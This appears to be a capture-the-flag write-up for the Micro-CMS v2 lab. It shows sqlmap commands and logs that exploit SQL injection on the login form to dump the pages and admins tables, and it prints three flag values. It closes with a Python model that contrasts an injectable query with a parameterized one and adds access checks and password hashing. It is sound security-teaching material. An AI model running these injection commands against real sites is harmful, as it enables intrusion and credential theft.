Micro-CMS v2 (Moderate, 3)
Flag0
Requesting /page/3 returns a 403 status code.
The /login endpoint is vulnerable to SQL injection, which can be used to pull information out of the database.
syine@MinetaLinux:~/repos/sqlmap-dev$ python3 sqlmap.py -u "http://35.227.24.107/9aaa0fe573/login" --data="username=1&password=1" --method=POST --threads=4 --tamper=space2comment --current-db
[07:15:31] [INFO] fetching current database
[07:15:31] [INFO] retrieving the length of query output
[07:15:31] [INFO] retrieved: 6
[07:15:44] [INFO] retrieved: level2
current database: 'level2'
syine@MinetaLinux:~/repos/sqlmap-dev$ python3 sqlmap.py -u "http://35.227.24.107/9aaa0fe573/login" --data="username=1&password=1" --method=POST --threads=4 --tamper=space2comment -D level2 --tables
[07:18:44] [INFO] fetching tables for database: 'level2'
[07:18:44] [INFO] fetching number of tables for database 'level2'
[07:18:45] [INFO] resumed: 2
[07:18:45] [INFO] retrieving the length of query output
[07:18:45] [INFO] resumed: 6
[07:18:45] [INFO] resumed: admins
[07:18:45] [INFO] retrieving the length of query output
[07:18:45] [INFO] resumed: 5
[07:18:45] [INFO] resumed: pages
Database: level2
[2 tables]
+--------+
| admins |
| pages |
+--------+
Dumping the pages table and reading the body of the entry whose id is 3 gives the flag.
syine@MinetaLinux:~/repos/sqlmap-dev$ python3 sqlmap.py -u "http://35.227.24.107/9aaa0fe573/login" --data="username=1&password=1" --method=POST --threads=4 --tamper=space2comment -D level2 -T pages --dump
[07:41:03] [INFO] fetching columns for table 'pages' in database 'level2'
[07:41:03] [INFO] resumed: 4
[07:41:03] [INFO] retrieving the length of query output
[07:41:03] [INFO] resumed: 2
[07:41:03] [INFO] resumed: id
[07:41:03] [INFO] retrieving the length of query output
[07:41:03] [INFO] resumed: 6
[07:41:03] [INFO] resumed: public
[07:41:03] [INFO] retrieving the length of query output
[07:41:03] [INFO] resumed: 5
[07:41:03] [INFO] resumed: title
[07:41:03] [INFO] retrieving the length of query output
[07:41:03] [INFO] resumed: 4
[07:41:03] [INFO] resumed: body
[07:41:03] [INFO] fetching entries for table 'pages' in database 'level2'
[07:41:03] [INFO] fetching number of entries for table 'pages' in database 'level2'
[07:41:03] [INFO] resumed: 3
[07:41:03] [INFO] retrieving the length of query output
[07:41:03] [INFO] resumed: 314
[07:41:03] [INFO] resuming partial value: ## Version 2\nThis version fixed the multit
[07:45:16] [INFO] retrieved: ## Version 2 This version fixed the multitude of security flaws and general functionality bugs that plagued v1. Additionally, we added user authentication; we're still not sure why we didn't think about that the first time, but hindsight is 20/20. By default, users need to be an admin to add or edit pages now.
[07:45:16] [INFO] retrieving the length of query output
[07:45:16] [INFO] retrieved: 1
[07:45:20] [INFO] retrieved: 1
[07:45:24] [INFO] retrieving the length of query output
[07:45:24] [INFO] retrieved: 1
[07:45:27] [INFO] retrieved: 1
[07:45:33] [INFO] retrieving the length of query output
[07:45:33] [INFO] retrieved: 19
[07:45:57] [INFO] retrieved: Micro-CMS Changelog
[07:45:57] [INFO] retrieving the length of query output
[07:45:57] [INFO] retrieved: 198
[07:49:14] [INFO] retrieved: Just testing some markdown functionality. ![adorable kitten](https://static1.squarespace.com/static/54e8ba93e4b07c3f655b452e/t/56c2a04520c64707756f4267/1493764650017/) <button>Some button</button>
[07:49:14] [INFO] retrieving the length of query output
[07:49:14] [INFO] retrieved: 1
[07:49:17] [INFO] retrieved: 2
[07:49:22] [INFO] retrieving the length of query output
[07:49:22] [INFO] retrieved: 1
[07:49:27] [INFO] retrieved: 1
[07:49:32] [INFO] retrieving the length of query output
[07:49:32] [INFO] retrieved: 13
[07:49:51] [INFO] retrieved: Markdown Test
[07:49:51] [INFO] retrieving the length of query output
[07:49:51] [INFO] retrieved: 89
[07:51:31] [INFO] retrieved: My secret is ^FLAG^8c960a5a298f1d68807144f9892d1a78a5f9333a6547c8b7449c369d6cc747a6$FLAG$
[07:51:31] [INFO] retrieving the length of query output
[07:51:31] [INFO] retrieved: 1
[07:51:35] [INFO] retrieved: 3
[07:51:41] [INFO] retrieving the length of query output
[07:51:41] [INFO] retrieved: 1
[07:51:44] [INFO] retrieved: 0
[07:51:49] [INFO] retrieving the length of query output
[07:51:49] [INFO] retrieved: 12
[07:52:08] [INFO] retrieved: Private Page
Database: level2
Table: pages
[3 entries]
+----+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+--------+
| id | body | title | public |
+----+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+--------+
| 1 | ## Version 2\nThis version fixed the multitude of security flaws and general functionality bugs that plagued v1. Additionally, we added user authentication; we're still not sure why we didn't think about that the first time, but hindsight is 20/20. By default, users need to be an admin to add or edit pages now.\n | Micro-CMS Changelog | 1 |
| 2 | Just testing some markdown functionality.\n\n![adorable kitten](https://static1.squarespace.com/static/54e8ba93e4b07c3f655b452e/t/56c2a04520c64707756f4267/1493764650017/)\n\n<button>Some button</button> | Markdown Test | 1 |
| 3 | My secret is ^FLAG^8c960a5a298f1d68807144f9892d1a78a5f9333a6547c8b7449c369d6cc747a6$FLAG$ | Private Page | 0 |
+----+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+--------+
Flag: ^FLAG^8c960a5a298f1d68807144f9892d1a78a5f9333a6547c8b7449c369d6cc747a6$FLAG$
Flag1
In the previous challenge, the /edit/<id> page let us change a post's title and body. Sending a POST request that sets title and body returns the flag in the server response.
Flag: ^FLAG^4c986324cc410221f14e7c22d07eab5212b047adee6c2832ae06daec5a2ef63d$FLAG$
Flag2
Reading the admins table reveals the credentials of a single admin account.
syine@MinetaLinux:~/repos/sqlmap-dev$ python3 sqlmap.py -u "http://35.227.24.107/9aaa0fe573/login" --data="username=1&password=1" --method=POST --threads=4 --tamper=space2comment -D level2 -T admins --dump
[07:20:30] [INFO] fetching columns for table 'admins' in database 'level2'
[07:20:30] [INFO] resumed: 3
[07:20:30] [INFO] retrieving the length of query output
[07:20:30] [INFO] resumed: 2
[07:20:30] [INFO] resumed: id
[07:20:30] [INFO] retrieving the length of query output
[07:20:30] [INFO] resumed: 8
[07:20:30] [INFO] resumed: username
[07:20:30] [INFO] retrieving the length of query output
[07:20:30] [INFO] resumed: 8
[07:20:30] [INFO] resumed: password
[07:20:30] [INFO] fetching entries for table 'admins' in database 'level2'
[07:20:30] [INFO] fetching number of entries for table 'admins' in database 'level2'
[07:20:30] [INFO] retrieved: 1
[07:20:34] [INFO] retrieving the length of query output
[07:20:34] [INFO] retrieved: 1
[07:20:38] [INFO] retrieved: 1
[07:20:43] [INFO] retrieving the length of query output
[07:20:43] [INFO] retrieved: 5
[07:20:55] [INFO] retrieved: jamee
[07:20:55] [INFO] retrieving the length of query output
[07:20:55] [INFO] retrieved: 6
[07:21:06] [INFO] retrieved: ladawn
Database: level2
Table: admins
[1 entry]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | jamee | ladawn |
+----+----------+----------+
Logging in with the stolen credentials gives the flag.
Flag: ^FLAG^29a451dbd0eb0af84bf1e7117053679f206a4bf73c770bab1e400dfdc6c7f101$FLAG$
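The three flags above come from three separate weaknesses: a login query that can be altered by its input, an edit handler that never checks who is calling it, and an admin password stored as plaintext. The following Python/sqlite3 model is an added example written for this writeup; it is not the Micro-CMS v2 code, whose framework and schema the lab does not expose. Everything in it is assumed: the table layout (modelled on the column names sqlmap returned), the admin account "alice" and its password, the session dict, and PBKDF2 as the password hash. It places the string-formatted lookup beside its parameterized replacement, shows the private-page and edit paths refusing anonymous callers, and verifies a salted hash instead of comparing a stored password.

```python
import hashlib
import hmac
import os
import sqlite3
from typing import Optional

PBKDF2_ROUNDS = 200_000  # assumed cost parameter; tune to the server's hardware


class Forbidden(Exception):
    """Raised where the real application would answer 403."""


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as 'salt_hex$digest_hex'."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    # constant-time comparison so timing does not reveal how many bytes matched
    return hmac.compare_digest(digest.hex(), digest_hex)


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the level2 database; all rows are constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT);
        CREATE TABLE pages  (id INTEGER PRIMARY KEY, title TEXT, body TEXT, public INTEGER);
        """
    )
    conn.execute("INSERT INTO admins (username, password) VALUES (?, ?)",
                 ("alice", hash_password("correct horse battery")))  # constructed account
    conn.executemany("INSERT INTO pages (title, body, public) VALUES (?, ?, ?)", [
        ("Micro-CMS Changelog", "## Version 2 ...", 1),
        ("Private Page", "My secret is FLAG{placeholder}", 0),
    ])
    return conn


def find_admin_unsafe(conn: sqlite3.Connection, username: str):
    """BEFORE: the statement is assembled by string formatting, the class of flaw
    sqlmap found on /login. A single quote in the input changes the SQL itself."""
    sql = f"SELECT id, password FROM admins WHERE username = '{username}'"
    return conn.execute(sql).fetchone()


def find_admin(conn: sqlite3.Connection, username: str):
    """AFTER: the value travels as a bound parameter and can never become SQL."""
    sql = "SELECT id, password FROM admins WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone()


def login(conn: sqlite3.Connection, username: str, password: str) -> Optional[dict]:
    row = find_admin(conn, username)
    if row is None or not verify_password(password, row[1]):
        return None
    return {"admin_id": row[0]}  # assumed session shape


def is_admin(session: Optional[dict]) -> bool:
    return session is not None and "admin_id" in session


def get_page(conn: sqlite3.Connection, session: Optional[dict], page_id: int):
    """Mirrors /page/<id>: a non-public page is served only to a logged-in admin."""
    row = conn.execute("SELECT id, title, body, public FROM pages WHERE id = ?", (page_id,)).fetchone()
    if row is None:
        return None
    if not row[3] and not is_admin(session):
        raise Forbidden(f"page {page_id} is private")
    return {"id": row[0], "title": row[1], "body": row[2], "public": bool(row[3])}


def edit_page(conn: sqlite3.Connection, session: Optional[dict], page_id: int, title: str, body: str) -> bool:
    """Mirrors /edit/<id>: the write path checks the session before touching the row."""
    if not is_admin(session):
        raise Forbidden("editing requires an admin session")
    cur = conn.execute("UPDATE pages SET title = ?, body = ? WHERE id = ?", (title, body, page_id))
    conn.commit()
    return cur.rowcount == 1


def demo() -> dict:
    """Runs each check and returns the outcomes so they can be asserted on."""
    conn = make_db()
    out = {}
    try:
        find_admin_unsafe(conn, "O'Brien")
        out["unsafe_lookup"] = "no error"
    except sqlite3.OperationalError:
        out["unsafe_lookup"] = "syntax error"  # the quote broke the statement
    out["safe_lookup"] = find_admin(conn, "O'Brien")  # None: simply no such user
    out["login_good"] = login(conn, "alice", "correct horse battery") is not None
    out["login_bad"] = login(conn, "alice", "wrong") is None
    session = login(conn, "alice", "correct horse battery")
    try:
        get_page(conn, None, 2)
        out["anon_private"] = "served"
    except Forbidden:
        out["anon_private"] = "403"
    out["admin_private"] = get_page(conn, session, 2)["title"]
    try:
        edit_page(conn, None, 2, "x", "y")
        out["anon_edit"] = "allowed"
    except Forbidden:
        out["anon_edit"] = "403"
    out["admin_edit"] = edit_page(conn, session, 2, "Private Page", "updated body")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The unsafe lookup is probed with a name containing a single quote rather than with a bypass string: a syntax error on `O'Brien` is already proof that input reaches the parser as SQL, which is the condition sqlmap's blind extraction above relies on, while the parameterized version treats the same input as an ordinary value. The private-page and edit checks are what the "users need to be an admin to add or edit pages now" line in the changelog promised but the lab did not enforce.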